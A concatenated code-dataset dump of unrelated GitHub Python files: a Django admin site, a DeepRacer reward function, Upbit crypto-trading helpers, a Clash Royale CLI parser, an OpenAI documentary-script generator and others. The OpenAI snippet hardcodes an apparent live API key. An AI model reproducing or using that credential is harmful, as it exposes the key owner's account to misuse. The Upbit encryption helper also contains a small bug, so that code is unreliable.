ret = run_pclmsi_p.poll()\ninfo(\"runpclmsi done!\")\n","repo_name":"zhxbab/TPG","sub_path":"runpclmsi.py","file_name":"runpclmsi.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23783434453","text":"from material.admin.sites import MaterialAdminSite\n\nfrom django.contrib import admin\nfrom django.urls import path\n\nfrom . import views\n\n\nclass CustomAdminSite(MaterialAdminSite):\n def get_urls(self):\n self._registry = admin.site._registry\n admin_urls = super().get_urls()\n custom_urls = [\n path(\"swagger-ui\", views.SwaggerUIView.as_view(admin=self), name=\"swagger-ui\"),\n ]\n return custom_urls + admin_urls # custom urls must be at the beginning\n\n def get(self, request):\n request.current_app == self.name\n return super().get(request)\n\n def get_app_list(self, request):\n app_list = super().get_app_list(request)\n app_list += [\n {\n \"name\": \"Swagger UI\",\n \"app_label\": \"Swagger UI\",\n \"models\": [\n {\n \"name\": \"Swagger\",\n \"object_name\": \"schema\",\n \"admin_url\": \"/admin/swagger-ui\",\n \"view_only\": True,\n }\n ],\n }\n ]\n return app_list\n\n\nsite = CustomAdminSite()\n","repo_name":"ravoratory/pgctf2","sub_path":"server/common/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"29813031966","text":"# -*- coding: utf-8 -*-\n\nimport math\nimport traceback\n\n\"\"\"\nThis is the source code you cut and paste into AWS console. It consists of RewardEvaluator class that is instantiated\nby the code of the desired reward_function(). The RewardEvaluator contains a set of elementary \"low level\" functions \n for example the distance calculation between waypoints, directions as well as higher-level functions (e.g. nearest turn \ndirection and distance) allowing you to design more complex reward logic.\n\"\"\"\n\n\nclass RewardEvaluator:\n\n # CALCULATION CONSTANTS - change for the performance fine tuning\n\n # Define minimum and maximum expected speed interval for the training. Both values should be corresponding to\n # parameters you are going to use for the Action space. Set MAX_SPEED equal to maximum speed defined there,\n # MIN_SPEED should be lower (just a bit) then expected minimum defined speed (e.g. Max speed set to 5 m/s,\n # speed granularity 3 => therefore, MIN_SPEED should be less than 1.66 m/s.\n MAX_SPEED = float(5.0)\n MIN_SPEED = float(1.5)\n\n # Define maximum steering angle according to the Action space settings. Smooth steering angle threshold is used to\n # set a steering angle still considered as \"smooth\". The value must be higher than minimum steering angle determined\n # by the steering Action space. E.g Max steering 30 degrees, granularity 3 => SMOOTH_STEERING_ANGLE_TRESHOLD should\n # be higher than 10 degrees.\n MAX_STEERING_ANGLE = 30\n SMOOTH_STEERING_ANGLE_TRESHOLD = 15 # Greater than minimum angle defined in action space\n\n # Constant value used to \"ignore\" turns in the corresponding distance (in meters). The car is supposed to drive\n # at MAX_SPEED (getting a higher reward). In case within the distance is a turn, the car is rewarded when slowing\n # down.\n SAFE_HORIZON_DISTANCE = 0.8 # meters, able to fully stop. See ANGLE_IS_CURVE.\n\n # Constant to define accepted distance of the car from the center line.\n CENTERLINE_FOLLOW_RATIO_TRESHOLD = 0.12\n\n # Constant to define a threshold (in degrees), representing max. angle within SAFE_HORIZON_DISTANCE. If the car is\n # supposed to start steering and the angle of the farthest waypoint is above the threshold, the car is supposed to\n # slow down\n ANGLE_IS_CURVE = 3\n\n # A range the reward value must fit in.\n PENALTY_MAX = 0.001\n REWARD_MAX = 89999 # 100000\n\n # params is a set of input values provided by the DeepRacer environment. For each calculation\n # this is provided\n params = None\n\n # Class properties - status values extracted from \"params\" input\n all_wheels_on_track = None\n x = None\n y = None\n distance_from_center = None\n is_left_of_center = None\n is_reversed = None\n heading = None\n progress = None\n steps = None\n speed = None\n steering_angle = None\n track_width = None\n waypoints = None\n closest_waypoints = None\n nearest_previous_waypoint_ind = None\n nearest_next_waypoint_ind = None\n\n log_message = \"\"\n\n # method used to extract class properties (status values) from input \"params\"\n def init_self(self, params):\n self.all_wheels_on_track = params['all_wheels_on_track']\n self.x = params['x']\n self.y = params['y']\n self.distance_from_center = params['distance_from_center']\n self.is_left_of_center = params['is_left_of_center']\n self.is_reversed = params['is_reversed']\n self.heading = params['heading']\n self.progress = params['progress']\n self.steps = params['steps']\n self.speed = params['speed']\n self.steering_angle = params['steering_angle']\n self.track_width = params['track_width']\n self.waypoints = params['waypoints']\n self.closest_waypoints = params['closest_waypoints']\n self.nearest_previous_waypoint_ind = params['closest_waypoints'][0]\n self.nearest_next_waypoint_ind = params['closest_waypoints'][1]\n\n # RewardEvaluator Class constructor\n def __init__(self, params):\n self.params = params\n self.init_self(params)\n\n # Method used to \"print\" status values and logged messages into AWS log. Be aware of additional cost Amazon will\n # charge you when logging is used heavily!!!\n def status_to_string(self):\n status = self.params\n if 'waypoints' in status: del status['waypoints']\n status['debug_log'] = self.log_message\n print(status)\n\n # Gets ind'th waypoint from the list of all waypoints retrieved in params['waypoints']. Waypoints are circuit track\n # specific (every time params is provided it is same list for particular circuit). If index is out of range (greater\n # than len(params['waypoints']) a waypoint from the beginning of the list ir returned.\n def get_way_point(self, index_way_point):\n if index_way_point > (len(self.waypoints) - 1):\n return self.waypoints[index_way_point - (len(self.waypoints))]\n elif index_way_point < 0:\n return self.waypoints[len(self.waypoints) + index_way_point]\n else:\n return self.waypoints[index_way_point]\n\n # Calculates distance [m] between two waypoints [x1,y1] and [x2,y2]\n @staticmethod\n def get_way_points_distance(previous_waypoint, next_waypoint):\n return math.sqrt(pow(next_waypoint[1] - previous_waypoint[1], 2) + pow(next_waypoint[0] - previous_waypoint[0], 2))\n\n # Calculates heading direction between two waypoints - angle in cartesian layout. Clockwise values\n # 0 to -180 degrees, anti clockwise 0 to +180 degrees\n @staticmethod\n def get_heading_between_waypoints(previous_waypoint, next_waypoint):\n track_direction = math.atan2(next_waypoint[1] - previous_waypoint[1], next_waypoint[0] - previous_waypoint[0])\n return math.degrees(track_direction)\n\n # Calculates the misalignment of the heading of the car () compared to center line of the track (defined by previous and\n # the next waypoint (the car is between them)\n def get_car_heading_error(self): # track direction vs heading\n next_point = self.get_way_point(self.closest_waypoints[1])\n prev_point = self.get_way_point(self.closest_waypoints[0])\n track_direction = math.atan2(next_point[1] - prev_point[1], next_point[0] - prev_point[0])\n track_direction = math.degrees(track_direction)\n return track_direction - self.heading\n\n # Based on CarHeadingError (how much the car is misaligned with th direction of the track) and based on the \"safe\n # horizon distance it is indicating the current speed (params['speed']) is/not optimal.\n def get_optimum_speed_ratio(self):\n if abs(self.get_car_heading_error()) >= self.MAX_STEERING_ANGLE:\n return float(0.34)\n if abs(self.get_car_heading_error()) >= (self.MAX_STEERING_ANGLE * 0.75):\n return float(0.67)\n current_position_xy = (self.x, self.y)\n current_wp_index = self.closest_waypoints[1]\n length = self.get_way_points_distance((self.x, self.y), self.get_way_point(current_wp_index))\n current_track_heading = self.get_heading_between_waypoints(self.get_way_point(current_wp_index),\n self.get_way_point(current_wp_index + 1))\n while True:\n from_point = self.get_way_point(current_wp_index)\n to_point = self.get_way_point(current_wp_index + 1)\n length = length + self.get_way_points_distance(from_point, to_point)\n if length >= self.SAFE_HORIZON_DISTANCE:\n heading_to_horizont_point = self.get_heading_between_waypoints(self.get_way_point(self.closest_waypoints[1]), to_point)\n if abs(current_track_heading - heading_to_horizont_point) > (self.MAX_STEERING_ANGLE * 0.5):\n return float(0.33)\n elif abs(current_track_heading - heading_to_horizont_point) > (self.MAX_STEERING_ANGLE * 0.25):\n return float(0.66)\n else:\n return float(1.0)\n current_wp_index = current_wp_index + 1\n\n # Calculates angle of the turn the car is right now (degrees). It is angle between previous and next segment of the\n # track (previous_waypoint - closest_waypoint and closest_waypoint - next_waypoint)\n def get_turn_angle(self):\n current_waypoint = self.closest_waypoints[0]\n angle_ahead = self.get_heading_between_waypoints(self.get_way_point(current_waypoint),\n self.get_way_point(current_waypoint + 1))\n angle_behind = self.get_heading_between_waypoints(self.get_way_point(current_waypoint - 1),\n self.get_way_point(current_waypoint))\n result = angle_ahead - angle_behind\n if angle_ahead < -90 and angle_behind > 90:\n return 360 + result\n elif result > 180:\n return -180 + (result - 180)\n elif result < -180:\n return 180 - (result + 180)\n else:\n return result\n\n # Indicates the car is in turn\n def is_in_turn(self):\n if abs(self.get_turn_angle()) >= self.ANGLE_IS_CURVE:\n return True\n else:\n return False\n return False\n\n # Indicates the car has reached final waypoint of the circuit track\n def reached_target(self):\n max_waypoint_index = len(self.waypoints) - 1\n if self.closest_waypoints[1] == max_waypoint_index:\n return True\n else:\n return False\n\n # Provides direction of the next turn in order to let you reward right position to the center line (before the left\n # turn position of the car sligthly right can be rewarded (and vice versa) - see is_in_optimized_corridor()\n def get_expected_turn_direction(self):\n current_waypoint_index = self.closest_waypoints[1]\n length = self.get_way_points_distance((self.x, self.y), self.get_way_point(current_waypoint_index))\n while True:\n from_point = self.get_way_point(current_waypoint_index)\n to_point = self.get_way_point(current_waypoint_index + 1)\n length = length + self.get_way_points_distance(from_point, to_point)\n if length >= self.SAFE_HORIZON_DISTANCE * 4.5:\n result = self.get_heading_between_waypoints(self.get_way_point(self.closest_waypoints[1]), to_point)\n if result > 2:\n return \"LEFT\"\n elif result < -2:\n return \"RIGHT\"\n else:\n return \"STRAIGHT\"\n current_waypoint_index = current_waypoint_index + 1\n\n # Based on the direction of the next turn it indicates the car is on the right side to the center line in order to\n # drive through smoothly - see get_expected_turn_direction().\n def is_in_optimized_corridor(self):\n if self.is_in_turn():\n turn_angle = self.get_turn_angle()\n if turn_angle > 0: # Turning LEFT - better be by left side\n if (self.is_left_of_center == True and self.distance_from_center <= (\n self.CENTERLINE_FOLLOW_RATIO_TRESHOLD * 2 * self.track_width) or\n self.is_left_of_center == False and self.distance_from_center <= (\n self.CENTERLINE_FOLLOW_RATIO_TRESHOLD / 2 * self.track_width)):\n return True\n else:\n return False\n else: # Turning RIGHT - better be by right side\n if self.is_left_of_center == True and self.distance_from_center <= (self.CENTERLINE_FOLLOW_RATIO_TRESHOLD / 2 * self.track_width) or self.is_left_of_center == False and self.distance_from_center <= (self.CENTERLINE_FOLLOW_RATIO_TRESHOLD * 2 * self.track_width):\n return True\n else:\n return False\n else:\n next_turn = self.get_expected_turn_direction()\n if next_turn == \"LEFT\": # Be more righ side before turn\n if self.is_left_of_center == True and self.distance_from_center <= (\n self.CENTERLINE_FOLLOW_RATIO_TRESHOLD / 2 * self.track_width) or self.is_left_of_center == False and self.distance_from_center <= (self.CENTERLINE_FOLLOW_RATIO_TRESHOLD * 2 * self.track_width):\n return True\n else:\n return False\n elif next_turn == \"RIGHT\": # Be more left side before turn:\n if self.is_left_of_center == True and self.distance_from_center <= (\n self.CENTERLINE_FOLLOW_RATIO_TRESHOLD * 2 * self.track_width) or self.is_left_of_center == False and self.distance_from_center <= (self.CENTERLINE_FOLLOW_RATIO_TRESHOLD / 2 * self.track_width):\n return True\n else:\n return False\n else: # Be aligned with center line:\n if self.distance_from_center <= (self.CENTERLINE_FOLLOW_RATIO_TRESHOLD * 2 * self.track_width):\n return True\n else:\n return False\n\n def is_optimum_speed(self):\n if abs(self.speed - (self.get_optimum_speed_ratio() * self.MAX_SPEED)) < (self.MAX_SPEED * 0.15) and self.MIN_SPEED <= self.speed <= self.MAX_SPEED:\n return True\n else:\n return False\n\n # Accumulates all logging messages into one string which you may need to write to the log (uncomment line\n # self.status_to_string() in evaluate() if you want to log status and calculation outputs.\n def log_feature(self, message):\n if message is None:\n message = 'NULL'\n self.log_message = self.log_message + str(message) + '|'\n\n # Here you can implement your logic to calculate reward value based on input parameters (params) and use\n # implemented features (as methods above)\n def evaluate(self):\n self.init_self(self.params)\n result_reward = float(0.001)\n try:\n # No reward => Fatal behaviour, NOREWARD! (out of track, reversed, sleeping)\n if self.all_wheels_on_track == False or self.is_reversed == True or (self.speed < (0.1 * self.MAX_SPEED)):\n self.log_feature(\"all_wheels_on_track or is_reversed issue\")\n self.status_to_string()\n return float(self.PENALTY_MAX)\n\n # REWARD 50 - EARLY Basic learning => easy factors accelerate learning\n # Right heading, no crazy steering\n if abs(self.get_car_heading_error()) <= self.SMOOTH_STEERING_ANGLE_TRESHOLD:\n self.log_feature(\"getCarHeadingOK\")\n result_reward = result_reward + self.REWARD_MAX * 0.3\n\n if abs(self.steering_angle) <= self.SMOOTH_STEERING_ANGLE_TRESHOLD:\n self.log_feature(\"getSteeringAngleOK\")\n result_reward = result_reward + self.REWARD_MAX * 0.15\n\n # REWARD100 - LATER ADVANCED complex learning\n # Ideal path, speed wherever possible, carefully in corners\n if self.is_in_optimized_corridor():\n self.log_feature(\"is_in_optimized_corridor\")\n result_reward = result_reward + float(self.REWARD_MAX * 0.45)\n\n if not (self.is_in_turn()) and (abs(self.speed - self.MAX_SPEED) < (0.1 * self.MAX_SPEED)) \\\n and abs(self.get_car_heading_error()) <= self.SMOOTH_STEERING_ANGLE_TRESHOLD:\n self.log_feature(\"isStraightOnMaxSpeed\")\n result_reward = result_reward + float(self.REWARD_MAX * 1)\n\n if self.is_in_turn() and self.is_optimum_speed():\n self.log_feature(\"isOptimumSpeedinCurve\")\n result_reward = result_reward + float(self.REWARD_MAX * 0.6)\n\n # REWAR - Progress bonus\n TOTAL_NUM_STEPS = 150\n if (self.steps % 100 == 0) and self.progress > (self.steps / TOTAL_NUM_STEPS):\n self.log_feature(\"progressingOk\")\n result_reward = result_reward + self.REWARD_MAX * 0.4\n\n # Reach Max Waypoint - get extra reward\n if self.reached_target():\n self.log_feature(\"reached_target\")\n result_reward = float(self.REWARD_MAX)\n\n except Exception as e:\n print(\"Error : \" + str(e))\n print(traceback.format_exc())\n\n # Finally - check reward value does not exceed maximum value\n if result_reward > 900000:\n result_reward = 900000\n\n self.log_feature(result_reward)\n # self.status_to_string()\n\n return float(result_reward)\n\n\n\"\"\"\nThis is the core function called by the environment to calculate reward value for every point of time of the training. \nparams: input values for the reward calculation (see above)\n\nUsually, this function contains all reward calculations a logic implemented. Instead, this code example is instantiating \nRewardEvaluator which has implemented a set of features one can easily combine and use.\n\"\"\"\n\n\ndef reward_function(params):\n re = RewardEvaluator(params)\n return float(re.evaluate())\n","repo_name":"VilemR/AWS_DeepRacer","sub_path":"reward_function.py","file_name":"reward_function.py","file_ext":"py","file_size_in_byte":17205,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"52"} +{"seq_id":"34614014753","text":"import time \nimport webbrowser\n\ntotal_breaks = 7\nbreak_count = 0\n\nwhile(break_count < total_breaks):\n print(\"current time:\" + time.ctime())\n time.sleep(60*60*2)\n webbrowser.open(\"www.google.com\")\n break_count += 1\n\n","repo_name":"Gnaneshwar-ctrl/helpful_utilities_-","sub_path":"timmer.py","file_name":"timmer.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23528250288","text":"import mimetypes\nimport os\nfrom datetime import datetime, date\n\nfrom django.http import FileResponse\nfrom django.shortcuts import render, get_object_or_404\n\n# Create your views here.\nfrom rest_framework.views import APIView\n\nfrom apps.reports.models import ReportFile\nfrom apps.reports.serializers import ReportFilterSerializer\nfrom apps.reports.tasks import notify_report_readiness, generate_report_task\nfrom rest_framework.response import Response\n\nclass GenerateReport(APIView):\n\n # @swagger_auto_schema(request_body=ReportFilterSerializer)\n def post(self, request, *args, **kwargs):\n serializer = ReportFilterSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n created_at_end = serializer.data.get(\"created_at_end\")\n filter_types = {\n \"created_at_begin\": serializer.data.get(\"created_at_begin\"),\n \"created_at_end\": created_at_end\n }\n\n report = ReportFile.objects.filter(filter_types=filter_types)\n if report.exists() and date.today() != datetime.strptime(created_at_end, \"%Y-%m-%d\").date():\n report = report.first()\n\n notify_report_readiness.delay(\n report_uuid=report.id,\n success=True\n )\n return Response({\"report_uuid\": report.id})\n\n task = generate_report_task.delay(\n user_id=request.user.id,\n **serializer.validated_data\n )\n\n return Response({\"report_uuid\": task.task_id})\n\n\nclass DownloadReport(APIView):\n\n def get(self, request, report_uuid):\n report = get_object_or_404(ReportFile, id=report_uuid)\n file = report.file\n file.open()\n filename = os.path.basename(file.name)\n file_expr = 'filename=\"{}\"'.format(filename)\n\n content_type = mimetypes.guess_type(str(filename))[0]\n response = FileResponse(file)\n response[\"Content-Length\"] = file.size\n\n response[\"Content-Type\"] = content_type\n response[\"Content-Disposition\"] = \"attachment; {}\".format(file_expr)\n\n return response","repo_name":"lolsecret/csat","sub_path":"apps/reports/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42069260983","text":"def countCharacters(fileName: str):\n counts = [0, 0, 0, 0]\n with open(fileName) as ob:\n mainText = ob.read()\n mainText = mainText.split('\\n')\n for i in mainText:\n for j in i:\n if j.isalpha():\n if j.isupper():\n counts[1] += 1\n else:\n counts[2] += 1\n elif j == ' ':\n counts[0] += 1\n elif j.isdigit():\n counts[3] += 1\n else:\n continue\n return counts\n\n\ncountedChars = countCharacters('sample.txt')\nprint('The number of spaces are {}, uppercase are {}, lowercase are {}, digits are {} '\n .format(countedChars[0], countedChars[1], countedChars[2], countedChars[3]))\n\n","repo_name":"sarthakpriyadarshi/repository_python","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22485988445","text":"def leaderboard_range(value):\n ivalue = int(value)\n if ivalue <= 1 or ivalue > 2147483647:\n print(\"'-l' must be between 0 and 2147483647.\")\n exit()\n return ivalue\n\n\ndef parse_args() -> dict:\n import argparse\n\n parser = argparse.ArgumentParser(\n prog = \"Stats Royale CLI\",\n description = \"Fetches statistics about Clash Royale from the terminal\"\n )\n\n type_of_request = parser.add_mutually_exclusive_group(required=True)\n\n parser.add_argument(\n \"-k\", \"--key\",\n help = \"Clash Royale API token (https://developer.clashroyale.com/#/getting-started)\"\n )\n\n type_of_request.add_argument(\n \"-t\", \"--tag\",\n help = \"Player tag\"\n )\n\n type_of_request.add_argument(\n \"-l\", \"--leaderboard\",\n nargs = \"?\",\n const = 10,\n type = leaderboard_range,\n help = \"Display last seasons Path of Legends leaderboard (default amount of spots: 10)\"\n )\n\n args = parser.parse_args()\n\n if args.tag:\n args.tag = args.tag.upper()\n if \"#\" not in args.tag:\n args.tag = \"#\" + args.tag\n\n return {\n \"api_key\": args.key,\n \"player_tag\": args.tag,\n \"leaderboard\": args.leaderboard\n }\n","repo_name":"Nqtural/stats-royale-cli","sub_path":"parse_args.py","file_name":"parse_args.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15159784035","text":"import pandas as pd\nimport time\nimport pyupbit\nfrom cryptography.fernet import Fernet\n\n\n# 암호화 / 복호화 클래스\nclass SimpleEnDecrypt:\n def __init__(self, key=None):\n if key is None: # 키가 없다면\n key = Fernet.generate_key() # 키를 생성한다\n self.key = key\n self.f = Fernet(self.key)\n\n def encrypt(self, data, is_out_string=True):\n if isinstance(data, bytes):\n ou = self.f.encrypt(data) # 바이트형태면 바로 암호화\n else:\n ou = self.f.encrypt(data, encode('utf-8')) # 인코딩 후 암호화\n if is_out_string is True:\n return ou.decode('utf-8') # 출력이 문자열이면 디코딩 후 반환\n else:\n return ou\n\n def decrypt(self, data, is_out_string=True):\n if isinstance(data, bytes):\n ou = self.f.decrypt(data) # 바이트형태이면 바로 복호화\n else:\n ou = self.f.decrypt(data.encode('utf-8')) # 인코딩 후 복호화\n if is_out_string is True:\n return ou.decode('utf-8') # 출력이 문자열이면 디코딩 후 반환\n else:\n return ou\n\n\n#RSI지표 수치를 구하는 함수\ndef GetRSI(ohlcv, period, st):\n '''\n RSI지표 수치를 구해준다. 첫번째: 분봉/일봉 정보, 두번째: 기간, 세번째: 기준 날짜\n ohlcv : Open, High, Low, Close, Volume의 약자\n 일단 내가 나중에 까먹을 까봐 써둠.\n open : 시작가\n High : 고점\n Low : 저점\n Close: 종가\n Volume: 거래량(이게 젤 중요)\n '''\n ohlcv[\"close\"] = ohlcv[\"close\"]\n delta = ohlcv[\"close\"].diff()\n up, down = delta.copy(), delta.copy()\n up[up < 0] = 0\n down[down > 0] = 0\n _gain = up.ewm(com=(period - 1), min_periods=period).mean()\n _loss = down.abs().ewm(com=(period - 1), min_periods=period).mean()\n RS = _gain / _loss\n return float(pd.Series(100 - (100 / (1 + RS)), name=\"RSI\").iloc[st])\n\n# 이동평균량(MA) 수치를 구하는 함수\n\n\ndef GetMA(ohlcv, period, st):\n close = ohlcv[\"close\"]\n ma = close.rolling(period).mean()\n return float(ma[st])\n\n# interval 기간동안 거래대금 상위 top개 코인 구하는 함수\n\n\ndef GetTopCoinList(interval, top):\n '''\n 거래대금이 많은 순으로 코인 리스트를 얻는다.\n 첫번째 인자: interval은 기간(day, week, minute15..등등 넣으면 됨.)\n 부번째 인자: 몇개까지?\n\n 반환형: 리스트\n '''\n print('----------------------Get Top', top,\n 'coins--------------------------')\n Tickers = pyupbit.get_tickers(fiat=\"KRW\")\n # 원화 마켓만 가져오려고 KRW값으로 된거만 거름보\n\n dic_coin_money = dict()\n # 아래 for문에서 일단 코인들 받아옴\n for ticker in Tickers:\n try:\n # 얘가 일봉/분봉 등을 가져오는 함수임. (코인명, 기간)\n df = pyupbit.get_ohlcv(ticker, interval)\n #일단 거래대금, 거래량을 알아야하니까 종가*거래량(=거래대금)으로 해봄 21.10.13\n volume_money = (df['close'][-1] * df['volume'][-1]) + \\\n (df['close'][-2] * df['volume'][-2])\n # df['close'][-1] 이거 오늘의 종가 데이터임.\n # 하루 전 거래대금 더해주는 이유: 얼추 거래량이 많은 코인을 구할 수 있으니까.\n dic_coin_money[ticker] = volume_money\n # print(ticker, volume_money)\n time.sleep(0.05)\n\n except Exception as e:\n print(\"exception: \", e)\n\n print(\"Getting information from 'Upbit' has been done.\")\n print(\"Sorting process activated\")\n # 거래량을 순으로 sort한다.\n dic_coin_money = sorted(dic_coin_money.items(),\n key=lambda x: x[1], reverse=True)\n # 아래 리스트에 거래량 많은 순으로 top개수 만큼 정렬 예정.\n coin_list = list()\n\n cnt = 0\n for coin_data in dic_coin_money:\n cnt += 1\n if cnt <= top:\n coin_list.append(coin_data[0])\n print(\"sorting is Done\")\n print('---------------GetTopCoinList Func End-----------------')\n return coin_list\n\n# 해당되는 리스트안에 해당 코인이 있는지 여부를 리턴하는 함수\n\n\ndef CheckCoinInList(CoinList, Ticker):\n InCoinOk = False\n for coinTicker in CoinList:\n if coinTicker == Ticker:\n InCoinOk = True\n break\n return InCoinOk\n\n# Ticker에 해당하는 코인의 수힉율을 구해서 리턴하는 함수. => 마이너스 방지\n\n\ndef GetRevenueRate(balances, Ticker):\n revenue_rate = 0.0\n for value in balances:\n realTicker = value['unit_currency'] + \"-\" + value['currency']\n if Ticker == realTicker:\n time.sleep(0.05)\n nowPrice = pyupbit.get_current_price(realTicker)\n revenue_rate = (\n nowPrice - float(value['avg_buy_price'])) * 100.0 / float(value['avg_buy_price'])\n return revenue_rate\n\n# Ticker에 해당하는 코인의 총 매수금액을 리턴하는 함수\n\n\ndef GetCoinNowMoney(balances, Ticker):\n CoinMoney = 0.0\n for value in balances:\n realTicker = value['unit_currency'] + \"-\" + value['currency']\n if Ticker == realTicker:\n # 해당 코인을 지정가 매도를 걸어놓으면 그 수량이 locked에 잡히게 됨.\n # 만약 전체 수량을 지정가 매도를 걸었다면 balance에 있던 잔고가 모두 locked로 이동하는 거\n # 따라서, 총 코인 매수 금액을 구하려면 balance + locked를 해줘야 한다.\n CoinMoney = float(value['avg_buy_price']) * \\\n (float(value['balance']) + float(value['locked']))\n break\n return CoinMoney\n\n# Ticker에 해당하는 코인이 매수된 상태면 참을 리턴하는 함수\n\n\ndef IsHasCoin(balances, Ticker):\n HasCoin = False\n for value in balances:\n realTicker = value['unit_currency'] + \"-\" + value['currency']\n if Ticker == realTicker:\n HasCoin = True\n return HasCoin\n\n# 내가 매수한(보유 중인) 코인 개수를 리턴하는 함수\n\n\ndef GetHasCoinCnt(balances):\n CoinCnt = 0\n for value in balances:\n avg_buy_price = float(value['avg_buy_price'])\n # 원화, Drop받은 코인(평균매입단가가 0임) 제외. 매입단가가 0이면 내 코인 아니니깐\n if avg_buy_price != 0:\n CoinCnt += 1\n return CoinCnt\n\n# 총 원금을 구하는 함수\n\n\ndef GetTotalMoney(balances):\n total = 0.0\n for value in balances:\n try:\n ticker = value['currency']\n if ticker == \"KRW\": # 원화일 때는 평균 매입 단가가 0이므로 구분해서 총 평가금액을 구한다.\n total += (float(value['balance']) + float(value['locked']))\n else:\n avg_buy_price = float(value['avg_buy_price'])\n\n #매수평균가(avg_buy_price)가 있으면서 잔고가 0이 아닌 코인들의 총 매수가격을 더해줍니다.\n if avg_buy_price != 0 and (float(value['balance']) != 0 or float(value['locked']) != 0):\n #balance(잔고 수량) + locked(지정가 매도로 걸어둔 수량) 이렇게 해야 제대로 된 값이 구해집니다.\n #지정가 매도 주문이 없다면 balance에 코인 수량이 100% 있지만 지정가 매도 주문을 걸면 그 수량만큼이 locked로 옮겨지기 때문입니다.\n total += (avg_buy_price *\n (float(value['balance']) + float(value['locked'])))\n except Exception as e:\n print(\"GetTotalMoney error:\", e)\n return total\n\n# 총 평가금액을 구하는 함수\n# 위 원금을 구하는 함수와 유사하지만 코인의 매수 평균가가 아니라 현재 평가가격 기준으로 총 평가 금액을 구한다.\n\n\ndef GetTotalRealMoney(balances):\n total = 0.0\n for value in balances:\n\n try:\n ticker = value['currency']\n if ticker == \"KRW\": # 원화일 때는 평균 매입 단가가 0이므로 구분해서 총 평가금액을 구한다.\n total += (float(value['balance']) + float(value['locked']))\n else:\n\n avg_buy_price = float(value['avg_buy_price'])\n # 드랍받은 코인(평균매입단가가 0이다) 제외 하고 현재가격으로 평가금액을 구한다,.\n if avg_buy_price != 0 and (float(value['balance']) != 0 or float(value['locked']) != 0):\n realTicker = value['unit_currency'] + \\\n \"-\" + value['currency']\n\n time.sleep(0.1)\n nowPrice = pyupbit.get_current_price(realTicker)\n total += (float(nowPrice) *\n (float(value['balance']) + float(value['locked'])))\n except Exception as e:\n print(\"GetTotalRealMoney error:\", e)\n\n return total\n","repo_name":"parade621/monarchBot","sub_path":"MyUpbit.py","file_name":"MyUpbit.py","file_ext":"py","file_size_in_byte":9105,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25974719296","text":"import openai\n\n# Your OpenAI API key and subject variable\napi_key = \"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\"\nsubject = \"Similarities between ancient mythology stories and stories of aliens\"\n\n# Initialize the OpenAI API client\nopenai.api_key = api_key\n\n# Define your prompt and other parameters\nprompt = f\"Create a 1-minute documentary script about {subject}.\"\nmax_tokens = 500 # You may need to adjust this based on how long you want the script to be\n\n# Make an API call to generate the script\nresponse = openai.Completion.create(\n engine=\"text-davinci-002\", # You can use other engines too\n prompt=prompt,\n max_tokens=max_tokens\n)\n\n# Extract and print the generated script\nscript = response.choices[0].text.strip()\nprint(\"Generated Script:\")\nprint(script)\n","repo_name":"edianibarrola/vidr","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13076979075","text":"import re\nimport SimpleHTTPServer\n\n# Import all communications handlers\nfrom legion.lib.comm_server import message_handler\n\n\nclass ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n \"\"\"Server handler class.\"\"\"\n\n _HANDLERS = {\n 'messages': message_handler.MessageHandler,\n }\n _REGEX = '/(?P[a-zA-Z0-9_.-~]+)/'\n\n def log_message(self, *args, **kwargs):\n \"\"\"Silence those pesky server-side print statements.\"\"\"\n pass\n\n def _GetCategoryName(self):\n \"\"\"Extracts and returns the category name.\"\"\"\n match = re.match(self._REGEX, self.path)\n if not match:\n return\n return match.group('category')\n\n def _GetHandler(self):\n \"\"\"Returns the category handler object if it exists.\"\"\"\n category = self._GetCategoryName()\n if not category:\n return self.send_error(403, 'Category must be supplied in the form of '\n '/category_name/...')\n handler = self._HANDLERS.get(category)\n if not handler:\n return self.send_error(405, 'No handler found for /%s/' % category)\n return handler()\n\n def do_GET(self):\n \"\"\"Dispatches GET requests.\"\"\"\n handler = self._GetHandler()\n if handler:\n handler.do_GET(self)\n\n def do_POST(self):\n \"\"\"Dispatches POST requests.\"\"\"\n handler = self._GetHandler()\n if handler:\n handler.do_POST(self)\n\n def do_PUT(self):\n \"\"\"Dispatches PUT requests.\"\"\"\n handler = self._GetHandler()\n if handler:\n handler.do_PUT(self)\n\n def do_DELETE(self):\n \"\"\"Dispatches DELETE requests.\"\"\"\n handler = self._GetHandler()\n if handler:\n handler.do_DELETE(self)\n","repo_name":"kiwibrowser/src","sub_path":"testing/legion/lib/comm_server/server_handler.py","file_name":"server_handler.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"2444527940","text":"# Vk app id\nAPP_ID = '5615994'\n\n# Minimal set of permissions to stream music\nPERMISSIONS = 'audio,groups,status,offline'\n\n\n# Album to stream music from\nALBUM_ID = '78066191'\n\n# Ids of targets (users or groups). If stream to group, use negated id.\nTARGETS = '-74043360'\n","repo_name":"Nafanya/vkmusicstreamer","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"189648894","text":"from .utils import 